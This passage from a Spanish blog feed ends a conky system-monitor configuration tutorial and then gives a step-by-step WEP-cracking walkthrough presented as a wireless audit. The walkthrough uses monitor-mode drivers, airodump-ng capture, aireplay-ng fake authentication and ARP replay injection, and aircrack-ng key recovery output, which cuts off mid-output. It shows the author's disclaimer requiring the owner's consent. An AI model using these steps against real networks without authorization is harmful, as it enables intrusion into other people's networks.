<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>A <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #00FF99}</span>CPU-<span style="color: #000000;">1</span>:<span style="color: #800000;">${color }</span> <span style="color: #800000;">${cpu cpu0}</span><span style="color: #000000; font-weight: bold;">%</span></pre>
</div>
</div>
<p>La siguiente linea nos dibujara una gráfica de barra del uso del cpuX igual que la linea anterior hay que indicar cual es el numero del cpu del cual queremos la grafica,  el siguiente numero (20) es el ancho después el (200)  la longitud de la barra, por ultimo se indica un degradado de color para esto se indica en que color inicia (ff0000) y en que color termina (0000ff) estos colores serán en hexadecimal .</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${cpugraph cpu0 20,200 ff0000 0000ff}</span></pre>
</div>
</div>
<p>Las siguientes lineas indican los tres  procesos principales que se están ejecutando, la variable ${top name 1} indica el nombre del proceso 1 y la variable ${top cpu 1} el uso que esta haciendo del cpu dicho proceso, y así consecutivamente.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #ddaa00}</span> <span style="color: #800000;">${top name 1}</span><span style="color: #800000;">${top cpu 1}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top name 2}</span><span style="color: #800000;">${top cpu 2}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top name 3}</span><span style="color: #800000;">${top cpu 3}</span></pre>
</div>
</div>
<p>Al igual que el Top Cpu  el Top Mem hace lo mismo solo que con los procesos y su uso de la memoria</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #ddaa00}</span> <span style="color: #800000;">${top_mem name 1}</span><span style="color: #800000;">${top_mem mem 1}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top_mem name 2}</span><span style="color: #800000;">${top_mem mem 2}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top_mem name 3}</span><span style="color: #800000;">${top_mem mem 3}</span></pre>
</div>
</div>
<p>La siguiente linea usa dos variables que nos indica el uso de la memoria, la variable $memperc% nos da el porcentaje del uso de la memoria y la variable  $mem/$memmax dos da el uso de la memoria contra el total de memoria disponible</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>MEM:  <span style="color: #800000;">${color }</span> <span style="color: #007800;">$memperc</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #007800;">$mem</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$memmax</span></pre>
</div>
</div>
<p>La siguiente line dibuja una grafica del uso de la memoria como parametro solo recibe el ancho y lago de la barra</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${membar 4,200}</span></pre>
</div>
</div>
<p>La siguiente linea usa dos variables que nos indica el uso de la memoria swap,  la variable $swapperc% nos da el porcentaje del uso de la memoria swap usada y la variable  $swap/$swapmax dos da el uso de la memoria contra el total de memoria swap disponible.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>SWAP: <span style="color: #800000;">${color }</span> <span style="color: #007800;">$swapperc</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #007800;">$swap</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$swapmax</span></pre>
</div>
</div>
<p>La siguiente linea al igual que la de memoria dibuja una grafiaca de barra con el ancho y largo indicado</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${swapbar 4,200}</span></pre>
</div>
</div>
<p>La siguientes lineas dan la información de espacio en disco La variable ${fs_free /} indica el espacio disponible en disco duro, la variable ${fs_size /} indica en cantidades el espacio usado y el disponible de todo el disco duro o el sistema de archivos usado.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>ROOT:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /}</span></pre>
</div>
</div>
<p>La siguiente linea solo dibuja una grafia de barra del uso del sistema de archivos o D.D. del tamaño y largo indicado</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${fs_bar 4,200 /}</span></pre>
</div>
</div>
<p>Las siguientes lineas siguientes indican como la linea anterior el espacio disponible en otros discos duros, estos discos deben de estar montados y la diferencia es que hay que indicar el directorio en donde se han montado los discos duros, en este casso hay dos discos duros sda1 y sda5</p>
<p>La variable  ${fs_free /media/sda1} indica el espacio disponible en dicho disco, montado en dicha dirección en este caso el directorio donde se monto fue /media/sda1</p>
<p>La variable ${fs_bar 4,200 /media/sda1} dibuja una grafica de barra del espacio en disco obviamente indicandole la ruta donde se monto</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>SDA1:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /media/sda1}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /media/sda1}</span>
<span style="color: #800000;">${fs_bar 4,200 /media/sda1}</span>
<span style="color: #800000;">${color #0077ff}</span>SDA5:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /media/sda5}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /media/sda5}</span>
<span style="color: #800000;">${fs_bar 4,200 /media/sda5}</span></pre>
</div>
</div>
<p>La siguiente linea indica la  dirección Ip de la interfaz de red deseada la variable ${addr eth1} es la que regresa la dirección ip de la interfaz de red eth1 la cual se puede cambiar por cualquiera que este disponible en este caso eth1 es la tarjeta de red wireless</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>WIFI: <span style="color: #800000;">${color #888888}</span>IP: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${addr eth1}</span></pre>
</div>
</div>
<p>La siguiente linea da el porcentaje de la potencia de la señal y una grafica de la misma donde la variable ${wireless_link_qual_perc eth1} nos indica el porcentaje y ${wireless_link_bar 4 eth1} la grafica de la señal de la tarjeta eth1, para saber las interfases de red disponibles usar el comando iwconfig para tarjetas wireless y ifconfig para tarjetas ethernet</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>Senal: <span style="color: #800000;">${color }</span><span style="color: #800000;">${wireless_link_qual_perc eth1}</span> <span style="color: #800000;">${wireless_link_bar 4 eth1}</span></pre>
</div>
</div>
<p>La siguiente linea nos da la velocidad de subida y descarga de nuestra interfaz de red en kb la variable ${downspeed eth1} nos indica la velocidad de descarga y ${upspeed eth1} la velocidad de subida de la tarjeta de red eth1</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>DOWN: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${downspeed eth1}</span> k<span style="color: #000000; font-weight: bold;">/</span>s          <span style="color: #800000;">${color #0077ff}</span>UP: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${upspeed eth1}</span> k<span style="color: #000000; font-weight: bold;">/</span>s</pre>
</div>
</div>
<p>La siguiente linea dibuja dos gráficas que indican la velocidad de descarga  y subida la variable ${downspeedgraph eth1 25,90 ff0000 0000ff} hace la grafica eth1 es la tarjeta de red que monitorea 25 y 90 son el ancho y alto de la grafica y ff0000 0000ff el color inicial y final con el que se dibujara la grafica, de la misma manera para ${upspeedgraph eth1 25,90 0000ff ff0000}</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #888888}</span><span style="color: #800000;">${downspeedgraph eth1 25,90 ff0000 0000ff}</span><span style="color: #800000;">${alignr}</span><span style="color: #800000;">${color #888888}</span><span style="color: #800000;">${upspeedgraph eth1 25,90 0000ff ff0000}</span></pre>
</div>
</div>
<p>La ultima linea nos indicara el total en Mb de datos enviados y recibidos la variable ${totaldown eth1} es la que indicara el total de datos descargados de la tarjeta de red eth1 y la variable  ${totalup eth1} para los datos enviados.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #0077ff}</span>TOTAL: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${totaldown eth1}</span>           <span style="color: #800000;">${color #0077ff}</span>TOTAL: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${totalup eth1}</span></pre>
</div>
</div>
<p>Con esto terminamos la descripción del código de configuración del conky existen muchas otras variables de configuración disponibles, aqui se mostraron las mas básicas para poder obtener un monitor vistoso y funcional.</p>
<p>Si desean mas información y variables visiten las siguientes paginas <a href="http://conky.sourceforge.net/variables.html">http://conky.sourceforge.net/variables.html </a>y <a href="http://conky.sourceforge.net/config_settings.html">http://conky.sourceforge.net/config_settings.html</a></p>
<p>Espero haya sido explicito y no muy redundante.</p>
<p>Saludos</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2008/10/10/mini-how-to-de-configuracion-de-conky-el-monitor/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Auditoria de seguridad wireless con ipw3945 ubuntu y aircrack</title>
		<link>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/</link>
		<comments>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/#comments</comments>
		<pubDate>Thu, 06 Mar 2008 02:38:33 +0000</pubDate>
		<dc:creator>Yovany</dc:creator>
				<category><![CDATA[ALL]]></category>
		<category><![CDATA[CODIGO]]></category>
		<category><![CDATA[MANUALES]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[AIRCRACK]]></category>
		<category><![CDATA[AUDITORIA]]></category>
		<category><![CDATA[INTEL]]></category>
		<category><![CDATA[IPW3945]]></category>
		<category><![CDATA[SEGURIDAD]]></category>
		<category><![CDATA[WIRELESS]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/?p=117</guid>
		<description><![CDATA[En vista al interes de muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless. Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner ...]]></description>
			<content:encoded><![CDATA[<p>En vista al interes de  muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.</p>
<p>Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.</p>
<p>Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW</p>
<p>Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">$ <span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> - build-essential
$ <span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> - linux-ubuntu-modules-$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #c20cb9; font-weight: bold;">uname</span> -r<span style="color: #7a0874; font-weight: bold;">&#41;</span> linux-restricted-modules-$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #c20cb9; font-weight: bold;">uname</span> -r<span style="color: #7a0874; font-weight: bold;">&#41;</span> linux-image-debug-$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #c20cb9; font-weight: bold;">uname</span> -r<span style="color: #7a0874; font-weight: bold;">&#41;</span> linux-image-$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #c20cb9; font-weight: bold;">uname</span> -r<span style="color: #7a0874; font-weight: bold;">&#41;</span> linux-headers-$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #c20cb9; font-weight: bold;">uname</span> -r<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre>
</div>
</div>
<p>Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.</p>
<p>Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw</p>
<p>descargamos las fuentes</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">wget</span> http:<span style="color: #000000; font-weight: bold;">//</span>dl.aircrack-ng.org<span style="color: #000000; font-weight: bold;">/</span>drivers<span style="color: #000000; font-weight: bold;">/</span>ipwraw-ng-2.3.4-04022008.tar.bz2</pre>
</div>
</div>
<p>Descomprimimos el paquete,</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">tar</span> <span style="color: #660033;">-xjf</span> ipwraw-ng-2.3.4-04022008.tar.bz2</pre>
</div>
</div>
<p>Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">make</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">make</span> <span style="color: #c20cb9; font-weight: bold;">install</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">make</span> install_ucode</pre>
</div>
</div>
<p>Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">echo</span> “blacklist ipwraw” <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">tee</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>modprobe.d<span style="color: #000000; font-weight: bold;">/</span>ipwraw
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">depmod</span> <span style="color: #660033;">-ae</span></pre>
</div>
</div>
<p>Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> modprobe <span style="color: #660033;">-r</span> ipw3945
&nbsp;
<span style="color: #c20cb9; font-weight: bold;">sudo</span> modprobe ipwraw</pre>
</div>
</div>
<p>Para cargar el ipw3945, hacemos lo mismo, pero al contrario.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> modprobe <span style="color: #660033;">-r</span> ipwraw
&nbsp;
<span style="color: #c20cb9; font-weight: bold;">sudo</span> modprobe ipw3945</pre>
</div>
</div>
<p>Despues de montar y desmontar los driver&#8217;s hay que esperar un poco para que se efectuen los cambios.</p>
<p>Para comprobar, que esten funcionando, tecleamos lo siguiente.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iwconfig</pre>
</div>
</div>
<p>Y devemos obtener algo como esto.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">lo        no wireless extensions.
&nbsp;
eth0      no wireless extensions.
&nbsp;
vmnet1    no wireless extensions.
&nbsp;
vmnet8    no wireless extensions.
&nbsp;
eth1      unassociated  ESSID:off<span style="color: #000000; font-weight: bold;">/</span>any
Mode:Monitor  <span style="color: #007800;">Channel</span>=<span style="color: #000000;">1</span>  Bit <span style="color: #007800;">Rate</span>=<span style="color: #000000;">54</span> Mb<span style="color: #000000; font-weight: bold;">/</span>s
&nbsp;
rtap0     no wireless extensions.</pre>
</div>
</div>
<p>Tal vez puedas obtener wifi0 en lugar de eth1</p>
<p>Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> <span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> aircrack-ng</pre>
</div>
</div>
<p>Listo, ahora empezaremos por averiguar cuales son los acces points accesibles</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">airodump-ng rtap0</pre>
</div>
</div>
<p>Y deberiamos obtener algo parecido a esto.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> CH  <span style="color: #000000;">0</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> Elapsed: <span style="color: #000000;">8</span> s <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">2008</span>-03-05 <span style="color: #000000;">21</span>:01
&nbsp;
BSSID              PWR  Beacons    <span style="color: #666666; font-style: italic;">#Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID</span>
&nbsp;
XX:XX:XX:XX:XX:XX    <span style="color: #000000;">0</span>       <span style="color: #000000;">86</span>        <span style="color: #000000;">9</span>    <span style="color: #000000;">0</span>   <span style="color: #000000;">1</span>  <span style="color: #000000;">54</span>. WEP  WEP         MAGI
&nbsp;
BSSID              STATION            PWR  Lost  Packets  Probes</pre>
</div>
</div>
<p>Al identificar nustro objetivo debemos ejecutar el siguiente <a href="http://www.vive-libre.com/blog/etc/script.sh">script</a> para poder inyectar trafico.</p>
<p>Veremos algo asi</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">“Indica el canal para eth1 o wifi0?
<span style="color: #000000;">1</span>
“Indica el rate de captura por defecto debe ser <span style="color: #000000;">2</span>”
<span style="color: #000000;">2</span>
“Indica el bssid objetivo”
XX:XX:XX:XX:XX:XX
“Configuracion completada, listo par inyectar”</pre>
</div>
</div>
<p>Empezamos a capturar los paquetes con el airodump-bg</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">airodump-ng <span style="color: #660033;">-c</span> CANAL <span style="color: #660033;">-w</span> FICHERO rtap0</pre>
</div>
</div>
<p>Y deberiamos obteneralgo asi</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">CH  <span style="color: #000000;">1</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> BAT: <span style="color: #000000;">1</span> hour <span style="color: #000000;">38</span> mins <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> Elapsed: <span style="color: #000000;">48</span> s <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">2008</span>-03-05 <span style="color: #000000;">21</span>:<span style="color: #000000;">34</span>
&nbsp;
BSSID              PWR RXQ  Beacons    <span style="color: #666666; font-style: italic;">#Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID</span>
&nbsp;
XX:XX:XX:XX:XX:XX    <span style="color: #000000;">0</span> <span style="color: #000000;">100</span>      <span style="color: #000000;">467</span>       <span style="color: #000000;">47</span>    <span style="color: #000000;">0</span>   <span style="color: #000000;">1</span>  <span style="color: #000000;">54</span>. WEP  WEP         MAGI
&nbsp;
BSSID              STATION            PWR  Lost  Packets  Probes</pre>
</div>
</div>
<p>Para poder inyectar necesitamos asociarnos con el acces point.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">aireplay-ng <span style="color: #660033;">-1</span> <span style="color: #000000;">0</span> <span style="color: #660033;">-e</span> ESSID <span style="color: #660033;">-a</span> MAC_PUNTODEACCESO <span style="color: #660033;">-h</span> NUESTRAMAC eth1</pre>
</div>
</div>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #000000;">21</span>:<span style="color: #000000;">52</span>:<span style="color: #000000;">30</span>  Waiting <span style="color: #000000; font-weight: bold;">for</span> beacon frame <span style="color: #7a0874; font-weight: bold;">&#40;</span>BSSID: XX:XX:XX:XX:XX:XX<span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #000000;">21</span>:<span style="color: #000000;">52</span>:<span style="color: #000000;">30</span>  Sending Authentication Request
<span style="color: #000000;">21</span>:<span style="color: #000000;">52</span>:<span style="color: #000000;">30</span>  Authentication successful
<span style="color: #000000;">21</span>:<span style="color: #000000;">52</span>:<span style="color: #000000;">30</span>  Sending Association Request
<span style="color: #000000;">21</span>:<span style="color: #000000;">52</span>:<span style="color: #000000;">32</span>  Association successful :-<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre>
</div>
</div>
<p>Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">aireplay-ng <span style="color: #660033;">-3</span> <span style="color: #660033;">-b</span> MAC_PUNTODEACCESO <span style="color: #660033;">-h</span> <span style="color: #660033;">-h</span> NUESTRAMAC eth1</pre>
</div>
</div>
<p>En unos cuantos segundos podemos ver como genero unos miles de DATA</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">Saving ARP requests <span style="color: #000000; font-weight: bold;">in</span> replay_arp-0305-<span style="color: #000000;">215511</span>.cap
You should also start airodump-ng to capture replies.
Read <span style="color: #000000;">16339</span> packets <span style="color: #7a0874; font-weight: bold;">&#40;</span>got <span style="color: #000000;">8045</span> ARP requests<span style="color: #7a0874; font-weight: bold;">&#41;</span>, sent <span style="color: #000000;">8042</span> packets...<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">333</span> pps<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre>
</div>
</div>
<p>Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.</p>
<p>Ahora solo  hay que pasar el fichero por el aircrack</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">aircrack-ng FICHERO.cap</pre>
</div>
</div>
<p>Y listo</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">                                                                       Aircrack-ng <span style="color: #000000;">0.9</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">&#91;</span>00:00:01<span style="color: #7a0874; font-weight: bold;">&#93;</span> Tested <span style="color: #000000;">1</span> keys <span style="color: #7a0874; font-weight: bold;">&#40;</span>got <span style="color: #000000;">552366</span> IVs<span style="color: #7a0874; font-weight: bold;">&#41;</span>
&nbsp;
KB    depth   byte<span style="color: #7a0874; font-weight: bold;">&#40;</span>vote<span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #000000;">0</span>    <span style="color: #000000;">0</span><span style="color: #000000; font-weight: bold;">/</span>  <span style="color: #000000;">1</span>   <span style="color: #000000;">39</span><span style="color: #7a0874; font-weight: bold;">&#40;</span> <span style="color: #000000;">100</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">11</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">33</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D6<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">15</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 6C<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">13</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 6D<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 0D<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">11</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">17</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">9</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">95</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">8</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 5D<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">76</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">93</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D0<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 00<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">4</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 0C<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">4</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 3A<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">3</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #000000;">1</span>    <span style="color: #000000;">0</span><span style="color: #000000; font-weight: bold;">/</span>  <span style="color: #000000;">1</span>   <span style="color: #000000;">93</span><span style="color: #7a0874; font-weight: bold;">&#40;</span> <span style="color: #000000;">100</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 03<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">37</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 06<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">31</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">83</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">19</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">19</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">13</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">39</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> B3<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D4<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">12</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 02<span style="color: #7a0874; font-weight: bold;">&#40;</span>  <span style="color: #000000;">11</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> CC<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">8</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> FD<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">7</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> 6C<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">86</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> D2<span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">5</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000;">30</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>   <span style="color: #000000;">4</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
